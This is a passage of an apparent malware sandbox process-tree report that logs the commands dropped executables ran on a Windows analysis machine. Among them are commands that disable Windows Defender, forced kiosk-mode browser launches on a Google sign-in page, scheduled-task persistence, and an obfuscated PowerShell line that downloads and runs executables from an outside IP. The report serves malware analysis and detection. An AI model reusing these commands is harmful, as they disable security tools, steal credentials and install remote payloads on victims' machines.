                                                            • Launches sc.exe
                                                            PID:3076
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete "MsSecCore"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:5772
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                            11⤵
                                                              PID:2892
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                              11⤵
                                                                PID:996
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                11⤵
                                                                  PID:4748
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                  11⤵
                                                                    PID:5980
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                    11⤵
                                                                      PID:4744
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc stop ddrver
                                                                      11⤵
                                                                      • Launches sc.exe
                                                                      PID:3156
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc delete ddrver
                                                                      11⤵
                                                                      • Launches sc.exe
                                                                      PID:5260
                                                          • C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:5828
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4328
                                                          • C:\Users\Admin\AppData\Local\Temp\10408210101\5e593f5981.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408210101\5e593f5981.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4364
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10408210101\5e593f5981.exe"
                                                              7⤵
                                                              • Downloads MZ/PE file
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5932
                                                          • C:\Users\Admin\AppData\Local\Temp\10408250101\a86f684b95.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408250101\a86f684b95.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:1808
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10408250101\a86f684b95.exe"
                                                              7⤵
                                                              • Downloads MZ/PE file
                                                              • Executes dropped EXE
                                                              PID:4932
                                                          • C:\Users\Admin\AppData\Local\Temp\10408330101\55ba869587.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408330101\55ba869587.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5232
                                                          • C:\Users\Admin\AppData\Local\Temp\10408340101\b123c29fff.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408340101\b123c29fff.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4276
                                                          • C:\Users\Admin\AppData\Local\Temp\10408350101\96b3ec11f4.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408350101\96b3ec11f4.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:5680
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /F /IM firefox.exe /T
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              PID:2372
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /F /IM chrome.exe /T
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              PID:1720
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /F /IM msedge.exe /T
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              PID:4208
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /F /IM opera.exe /T
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              PID:4320
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /F /IM brave.exe /T
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              PID:5396
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                              7⤵
                                                                PID:4472
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                  8⤵
                                                                  • Drops desktop.ini file(s)
                                                                  • Checks processor information in registry
                                                                  • Modifies registry class
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5208
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2024 -prefsLen 27099 -prefMapHandle 2028 -prefMapSize 270279 -ipcHandle 2104 -initialChannelId {7216a9b9-02ad-4cd5-a0e8-c0b2e17ad8ef} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                    9⤵
                                                                      PID:2940
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2492 -prefsLen 27135 -prefMapHandle 2496 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {4dc9e004-160c-400f-a7e9-dbbcecb13a06} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                      9⤵
                                                                        PID:384
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3864 -prefsLen 25164 -prefMapHandle 3868 -prefMapSize 270279 -jsInitHandle 3872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3880 -initialChannelId {481b4f5e-6b5f-47cc-ad1a-23bf4cf257af} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                        9⤵
                                                                        • Checks processor information in registry
                                                                        PID:1788
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4028 -prefsLen 27276 -prefMapHandle 4032 -prefMapSize 270279 -ipcHandle 4116 -initialChannelId {ec17edf2-1a84-4d0e-9879-c0555a7cf8a5} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                        9⤵
                                                                          PID:3520
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2912 -prefsLen 34775 -prefMapHandle 2832 -prefMapSize 270279 -jsInitHandle 2836 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3160 -initialChannelId {80d2d26f-d7e0-48db-a6e5-5caac5dcdc5a} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                          9⤵
                                                                          • Checks processor information in registry
                                                                          PID:1568
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4704 -prefsLen 35012 -prefMapHandle 3216 -prefMapSize 270279 -ipcHandle 5072 -initialChannelId {5cb87c47-e028-47b8-9862-dc26f8448f65} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                          9⤵
                                                                          • Checks processor information in registry
                                                                          PID:6548
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5280 -prefsLen 32900 -prefMapHandle 5284 -prefMapSize 270279 -jsInitHandle 5288 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5296 -initialChannelId {d1c1c5aa-c8e7-495a-9335-33427e1c411a} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                          9⤵
                                                                          • Checks processor information in registry
                                                                          PID:6576
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5524 -prefsLen 32952 -prefMapHandle 5520 -prefMapSize 270279 -jsInitHandle 5516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5540 -initialChannelId {820b8cfc-2e08-4707-882c-b3056f86a29a} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                          9⤵
                                                                          • Checks processor information in registry
                                                                          PID:6624
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5488 -prefsLen 32952 -prefMapHandle 5484 -prefMapSize 270279 -jsInitHandle 5480 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5468 -initialChannelId {394250b6-5c39-4022-b04b-ced585a77c8c} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                          9⤵
                                                                          • Checks processor information in registry
                                                                          PID:6696
                                                                  • C:\Users\Admin\AppData\Local\Temp\10408360101\8bc5209835.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10408360101\8bc5209835.exe"
                                                                    6⤵
                                                                    • Modifies Windows Defender DisableAntiSpyware settings
                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                    • Modifies Windows Defender TamperProtection settings
                                                                    • Modifies Windows Defender notification settings
                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Identifies Wine through registry keys
                                                                    • Windows security modification
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:2400
                                                                  • C:\Users\Admin\AppData\Local\Temp\10408370101\c95b3da7df.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10408370101\c95b3da7df.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:7980
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                      7⤵
                                                                        PID:6684
                                                                    • C:\Users\Admin\AppData\Local\Temp\10408380101\8480483e2e.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10408380101\8480483e2e.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:1976
                                                                    • C:\Users\Admin\AppData\Local\Temp\10408390101\5338edf835.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10408390101\5338edf835.exe"
                                                                      6⤵
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Identifies Wine through registry keys
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:7932
                                                                    • C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:4616
                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                        "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                                                                        7⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:7020
                                                                      • C:\ProgramData\Google\Chrome\chrome.exe
                                                                        "C:\ProgramData\Google\Chrome\chrome.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:4768
                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                          "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                                                                          8⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:5892
                                                                    • C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:6464
                                                                    • C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe"
                                                                      6⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Drops file in Windows directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:7532
                                                                      • C:\Windows\SysWOW64\CMD.exe
                                                                        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                        7⤵
                                                                          PID:4208
                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                            tasklist
                                                                            8⤵
                                                                            • Enumerates processes with tasklist
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:8184
                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                            findstr /I "opssvc wrsa"
                                                                            8⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4676
                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                            tasklist
                                                                            8⤵
                                                                            • Enumerates processes with tasklist
                                                                            PID:1972
                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                            findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                            8⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:6468
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c md 418377
                                                                            8⤵
                                                                              PID:6524
                                                                            • C:\Windows\SysWOW64\extrac32.exe
                                                                              extrac32 /Y /E Leon.cab
                                                                              8⤵
                                                                                PID:6340
                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                findstr /V "BEVERAGES" Compilation
                                                                                8⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5436
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                                8⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2388
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                                8⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2416
                                                                              • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                                Passwords.com N
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:5756
                                                                              • C:\Windows\SysWOW64\choice.exe
                                                                                choice /d y /t 5
                                                                                8⤵
                                                                                  PID:688
                                                                            • C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:8072
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                7⤵
                                                                                  PID:2764
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                    8⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:5520
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  "C:\Windows\system32\svchost.exe"
                                                                                  7⤵
                                                                                  • Downloads MZ/PE file
                                                                                  • Adds Run key to start application
                                                                                  PID:3508
                                                                                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                    "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                    8⤵
                                                                                    • Sets service image path in registry
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious behavior: LoadsDriver
                                                                                    PID:7400
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Remove-MpPreference -ExclusionPath C:\
                                                                                      9⤵
                                                                                        PID:8092
                                                                                    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                      8⤵
                                                                                      • Deletes itself
                                                                                      • Executes dropped EXE
                                                                                      PID:7440
                                                                                • C:\Users\Admin\AppData\Local\Temp\10408440101\EPTwCQd.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10408440101\EPTwCQd.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:1708
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                    7⤵
                                                                                      PID:7236
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      7⤵
                                                                                        PID:7508
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10408450101\XOPPRUc.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10408450101\XOPPRUc.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:12200
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                        7⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:12228
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10408460101\qWR3lUj.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10408460101\qWR3lUj.exe"
                                                                                      6⤵
                                                                                        PID:7556
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          7⤵
                                                                                            PID:6080
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10408470101\h8NlU62.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10408470101\h8NlU62.exe"
                                                                                          6⤵
                                                                                            PID:7512
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              7⤵
                                                                                                PID:7292
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                7⤵
                                                                                                  PID:3076
                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                      1⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:3896
                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                      1⤵
                                                                                      • Enumerates connected drives
                                                                                      • Drops file in Windows directory
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:244
                                                                                      • C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe
                                                                                        "C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:2328
                                                                                        • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                          C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2316
                                                                                          • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                            C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                            4⤵
                                                                                            • Checks computer location settings
                                                                                            • Loads dropped DLL
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:6080
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))
                                                                                              5⤵
                                                                                              • Blocklisted process makes network request
                                                                                              • Downloads MZ/PE file
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:3288
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\SysWOW64\cmd.exe
                                                                                            4⤵
                                                                                            • Drops file in Windows directory
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:3708
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:1592
                                                                                        • C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                                                          C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:4376
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            C:\Windows\System32\cmd.exe
                                                                                            4⤵
                                                                                              PID:4988
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\SysWOW64\cmd.exe
                                                                                              4⤵
                                                                                              • Drops file in Windows directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4380
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:3760
                                                                                          • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                            C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:1544
                                                                                            • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                              C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                              4⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              • Loads dropped DLL
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4912
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\SysWOW64\cmd.exe
                                                                                              4⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:6660
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 680 -ip 680
                                                                                        1⤵
                                                                                          PID:5264
                                                                                        • C:\ProgramData\TECLA\Updater.exe
                                                                                          C:\ProgramData\TECLA\Updater.exe /u
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in System32 directory
                                                                                          • Checks processor information in registry
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:3620
                                                                                          • C:\Windows\TEMP\datCB2B.tmp\datCB3B.exe
                                                                                            C:\Windows\TEMP\datCB2B.tmp\datCB3B.exe
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in System32 directory
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:2176
                                                                                            • C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe
                                                                                              "C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Drops file in System32 directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:7384
                                                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
